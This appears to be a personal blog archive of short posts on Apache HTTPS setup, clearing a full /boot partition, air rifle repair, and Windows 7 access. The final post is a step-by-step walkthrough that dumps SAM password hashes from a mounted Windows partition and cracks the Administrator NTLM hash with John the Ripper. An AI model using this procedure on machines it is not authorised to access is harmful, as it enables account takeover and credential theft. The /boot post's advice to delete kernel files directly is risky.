Hack windows 7 without tools

Stuck with a Windows 7 box but don’t have SYSTEM access? Need access? You don’t need any tools.

 

Much like the Windows NT local privilege escalation trick, this is a great way to hack Windows 7.

 

Windows NT Local Priv Escalation


Posted in Security

Enable HTTPS 443 on Apache 2


Generate your SSL cert

mkdir crt
mkdir key
openssl req -new -x509 -days 365 -keyout key/TomSchaefer.key -out crt/TomSchaefer.crt -nodes -subj '/O=TomSchaefer.org/OU=TomSchaefer.org/CN=www.TomSchaefer.org'

This operation will create two files, crt/TomSchaefer.crt and key/TomSchaefer.key, that you will use in your VirtualHost definition to enable SSL encryption using that key.

 

Change your virtualhost config

Open your VirtualHost config file. You should have something along the lines of:

<VirtualHost *>
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/www/vhost1
ServerName vhost1.yourdomain.com
DirectoryIndex index.php
ErrorLog /var/log/apache2/vhost1-error.log
CustomLog /var/log/apache2/vhost1-access.log combined
# AllowOverride is only accepted inside a <Directory> block
<Directory /var/www/vhost1>
Options Indexes FollowSymLinks
AllowOverride All
</Directory>

</VirtualHost>

With the new config added, it should look like this:

<VirtualHost *:80>
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/www/vhost1
ServerName vhost1.yourdomain.com
DirectoryIndex index.php
ErrorLog /var/log/apache2/vhost1-error.log
<Location />
RewriteEngine on
RewriteCond %{HTTPS} off
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R]
</Location>
</VirtualHost>
<VirtualHost *:443>
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/www/vhost1
ServerName vhost1.yourdomain.com
DirectoryIndex index.php
ErrorLog /var/log/apache2/vhost1-error.log
CustomLog /var/log/apache2/vhost1-access.log combined
SSLEngine On
SSLCertificateFile /etc/apache2/ssl/crt/TomSchaefer.crt
SSLCertificateKeyFile /etc/apache2/ssl/key/TomSchaefer.key
<Location />
SSLRequireSSL
SSLVerifyClient optional
SSLVerifyDepth 1
SSLOptions +StdEnvVars +StrictRequire
</Location>

</VirtualHost>

 

sudo a2enmod rewrite

sudo a2enmod ssl

sudo /etc/init.d/apache2 restart

 

You may also have to configure Apache to listen on port 443 by adding this to your config:

Listen 443

Debian will have this set by default! Enjoy!
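A check worth running before restarting Apache, as an added example that is not part of the original post: it generates the same kind of self-signed pair in a scratch directory, then confirms that the certificate belongs to the key and that the unencrypted key (`-nodes`) is readable only by its owner. The file names, the `example.test` subject, the explicit `-newkey rsa:2048` and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post); names and subject are placeholders.

# make_pair DIR CN: the post's openssl req call, run under a restrictive umask
# so the private key is never created group- or world-readable.
make_pair() {
    (
        umask 077
        mkdir -p "$1/crt" "$1/key" &&
        openssl req -new -x509 -days 365 -newkey rsa:2048 -nodes \
            -keyout "$1/key/site.key" -out "$1/crt/site.crt" \
            -subj "/O=example.test/CN=$2" 2>/dev/null
    )
}

# pair_matches CRT KEY: true only if the certificate carries the public key
# derived from the private key.
pair_matches() {
    from_crt=$(openssl x509 -in "$1" -noout -pubkey 2>/dev/null) || return 1
    from_key=$(openssl pkey -in "$2" -pubout 2>/dev/null) || return 1
    [ -n "$from_crt" ] && [ "$from_crt" = "$from_key" ]
}

# key_is_private KEY: true only if group and others have no permission bits.
key_is_private() {
    [ "$(ls -ld "$1" | cut -c5-10)" = "------" ]
}

# check_pair CRT KEY: print one line per finding, return non-zero on any.
check_pair() {
    rc=0
    pair_matches "$1" "$2" || { echo "MISMATCH: $1 does not belong to $2"; rc=1; }
    key_is_private "$2"    || { echo "PERMS: $2 is readable beyond its owner"; rc=1; }
    return $rc
}

# Demo in a scratch directory that is removed afterwards.
demo() {
    d=$(mktemp -d) || return 1
    make_pair "$d" www.example.test && check_pair "$d/crt/site.crt" "$d/key/site.key"
    status=$?
    rm -rf "$d"
    return $status
}
demo && echo "certificate and key are consistent"
```

To check the real files, call `check_pair` with the paths given in `SSLCertificateFile` and `SSLCertificateKeyFile`.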

Posted in linux, Security, Web Security

/boot is full. No space left!

What do you do? You have an unmet dependency, so every time you try to run apt-get autoremove it fails. /boot is at 100% utilization and it’s not looking good.

This is the nightmare I just lived for the past day or so. I thought about how I could solve this issue for a bit, crossed my fingers and tried it. (After I made backups duh!)

 

Find what kernel you’re using

uname -r

Don’t touch this kernel until everything is solved. Make a note of it and do not delete it.

 

List all installed kernels

dpkg --list 'linux-image*'

 

Now remove all old kernels

sudo apt-get remove linux-image-2.6.32-40-generic

 

If that fails because /boot still doesn’t have room then you’re going to need to improvise.

cd /boot

rm vmlinuz-2.6.32-40-generic-pae

 

This will get you some temporary room.  See how much room is available and delete more unused files if necessary.

df -h

 

Now that you have some free room remove everything old!

apt-get autoremove

 

Ahmad submitted an awesome trick:

dpkg -l 'linux-*' | sed '/^ii/!d;/'"$(uname -r | sed "s/\(.*\)-\([^0-9]\+\)/\1/")"'/d;s/^[^ ]* [^ ]* \([^ ]*\).*/\1/;/[0-9]/!d' | xargs sudo apt-get -y purge

Using apt-get autoremove freed up around 40MB space in my case. However, Ahmad’s script freed up over 1GB of unused crap. Great share!
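A dry-run take on the same idea, as an added example that is not Ahmad's code: it lists what would be purged and removes nothing. It goes slightly beyond the one-liner by matching the running kernel version literally and by only considering package names that contain a version; the function names, the running release 2.6.32-41-generic and the sample `dpkg -l` listing are constructed for illustration.

```shell
#!/bin/sh
# Added example: dry run only, nothing is removed.

# kernel_base RELEASE: strip the flavour suffix from `uname -r` output,
# e.g. 2.6.32-41-generic-pae -> 2.6.32-41
kernel_base() {
    printf '%s\n' "$1" | sed 's/^\([0-9][0-9.]*-[0-9][0-9]*\).*/\1/'
}

# purge_candidates RELEASE: read `dpkg -l` output for linux-* on stdin and print
# installed, versioned packages that do not belong to the running kernel.
purge_candidates() {
    awk -v base="$(kernel_base "$1")" '
        $1 != "ii"               { next }  # skip headers and removed (rc) entries
        $2 !~ /-[0-9]+\.[0-9]+/  { next }  # skip unversioned names (meta packages)
        {
            n = index($2, base)            # literal match, "." is not a wildcard
            if (n) {
                rest = substr($2, n + length(base))
                if (rest == "" || substr(rest, 1, 1) == "-") next  # running kernel
            }
            print $2
        }'
}

# Constructed sample of `dpkg -l` output (not taken from a real host).
sample_dpkg_output() {
    cat <<'EOF'
||/ Name                             Version        Description
+++-================================-==============-==========================
ii  linux-firmware                   1.34.14        Firmware for kernel drivers
ii  linux-headers-2.6.32-40          2.6.32-40.87   Header files
ii  linux-headers-2.6.32-40-generic  2.6.32-40.87   Header files for generic
ii  linux-headers-2.6.32-41          2.6.32-41.91   Header files
ii  linux-headers-2.6.32-41-generic  2.6.32-41.91   Header files for generic
ii  linux-image-2.6.32-38-generic    2.6.32-38.83   Kernel image
rc  linux-image-2.6.32-39-generic    2.6.32-39.86   Kernel image
ii  linux-image-2.6.32-40-generic    2.6.32-40.87   Kernel image
ii  linux-image-2.6.32-41-generic    2.6.32-41.91   Kernel image
ii  linux-image-generic              2.6.32.41.48   Generic kernel meta package
ii  linux-libc-dev:amd64             2.6.32-41.91   Headers for development
EOF
}

# Review this list first; only then pass the names to apt-get purge by hand.
sample_dpkg_output | purge_candidates 2.6.32-41-generic
```

On a real system, replace the sample with `dpkg -l 'linux-*' | purge_candidates "$(uname -r)"` and read the list before purging anything.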

Posted in Security

Disassemble gamo Bone Collector IGT

There’s nothing worse than starting to lose FPS without a reason. Just in time for my warranty to lapse. Damn it Gamo….

So I built my own press to disassemble the Gamo air rifle. The gas spring doesn’t need that much room, but you need a press to install and remove it.

After I got the whole thing taken apart, I found some of the worst damage I’ve ever seen on a plunger.

 


The press isn’t hard to make. You just need some wood and some time. I used a 1/2 inch bolt to press the gas piston to uninstall and install. On the Bone Collector model you must remove the reset wire on the trigger group before going too far.

Posted in Security

Crack windows 7 password

1. Boot the system with BackTrack 4 and wait for the operating system to load. Use the "startx" command to get the desktop.

2. Open the Konsole and use the command "fdisk -l" to see the details of your partitions. The partition name sda stands for SATA type and hda stands for IDE.

3. Create a directory, say

  "mkdir /mnt/sda2"

4. Mount your device partition to the directory

  "mount -t ntfs /dev/sda2 /mnt/sda2"

where /dev/sda2 is your Windows 7 operating system partition.

5. Change the directory to the location of the "SAM" file, where the password hashes of the Windows operating system are stored.

  "cd /mnt/sda2/Windows/System32/config"

6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1"

  "samdump2 system sam > /root/pass1"

7. Using the "grep" command, search for the Administrator hash in the file and write it to another file, "pass2"

  "cat /root/pass1 | grep Administrator > /root/pass2"

8. Change the directory to /pentest/passwords/jtr

   "cd /pentest/passwords/jtr"

9. Type ./john to see the format and the various cracking options.

10. Here Windows uses the NTLM hash, so we use the following command to crack it.

   "./john --format=NT /root/pass2"
Posted in Security